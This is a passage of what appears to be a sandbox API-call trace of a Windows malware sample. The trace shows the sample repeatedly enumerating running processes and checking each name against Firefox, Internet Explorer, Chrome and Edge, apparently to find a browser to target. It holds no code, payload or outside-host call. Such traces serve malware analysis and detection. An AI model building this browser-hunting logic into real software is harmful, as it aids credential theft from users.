szExeFile="doctrine alcohol.exe")) returned 1 [0237.865] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0237.865] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0237.865] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0237.865] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0237.865] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0237.865] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0237.865] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0237.865] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0237.865] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.865] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0237.866] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0237.866] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0237.866] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0237.866] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.866] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.866] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0237.867] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0237.867] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0237.867] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.867] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0237.867] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0237.867] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0237.867] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0237.867] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.867] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.868] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0237.868] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0237.868] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0237.868] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.868] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0237.868] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0237.868] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0237.868] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0237.868] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.868] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0237.869] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0237.869] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0237.869] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0237.869] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0237.869] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0237.869] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0237.869] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0237.869] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0237.869] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.869] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0237.870] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0237.870] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0237.870] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0237.870] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0237.870] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0237.870] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0237.871] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0237.871] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0237.871] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0237.871] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0237.871] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0237.871] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0237.871] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0237.871] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0237.871] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0237.872] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0237.872] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0237.872] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0237.872] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0237.872] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0237.872] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0237.872] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0237.872] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0237.872] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0237.872] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0237.873] CloseHandle (hObject=0xd4) returned 1 [0237.873] Sleep (dwMilliseconds=0x3e8) [0238.900] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0238.901] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0238.902] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0238.902] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0238.902] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0238.902] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0238.902] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0238.902] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0238.902] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0238.902] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0238.902] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0238.902] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0238.903] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0238.903] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0238.903] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0238.903] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.903] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0238.904] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0238.904] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0238.904] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0238.904] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0238.904] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0238.904] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0238.904] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0238.904] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0238.904] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.904] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0238.905] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0238.905] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0238.905] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0238.905] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0238.905] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0238.905] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0238.905] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0238.905] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0238.905] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.905] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0238.906] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0238.906] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0238.906] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0238.906] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.906] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0238.906] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0238.906] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0238.906] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0238.906] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0238.906] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0238.907] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0238.907] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0238.907] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0238.907] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0238.907] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.908] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0238.908] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0238.908] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0238.908] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.908] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.908] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0238.908] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0238.908] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0238.908] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.908] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.909] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0238.909] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0238.909] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0238.909] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.909] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.909] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0238.909] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0238.909] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0238.909] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.909] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.910] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0238.910] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0238.910] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0238.910] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.910] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0238.910] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0238.910] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0238.910] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0238.910] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0238.911] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.911] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0238.911] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0238.911] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0238.911] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.911] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.912] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0238.912] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0238.912] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0238.912] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.912] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0238.912] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0238.912] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0238.912] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0238.912] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0238.912] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0238.913] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0238.913] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0238.913] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0238.913] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.913] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0238.913] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0238.913] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0238.913] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0238.913] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.913] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.914] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0238.914] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0238.914] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0238.914] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.914] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0238.914] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0238.914] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0238.915] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0238.915] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.915] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0238.915] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0238.915] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0238.915] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0238.915] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0238.915] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0238.916] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0238.916] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0238.916] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0238.916] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0238.916] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0238.916] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0238.916] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0238.916] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0238.916] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0238.916] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0238.917] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 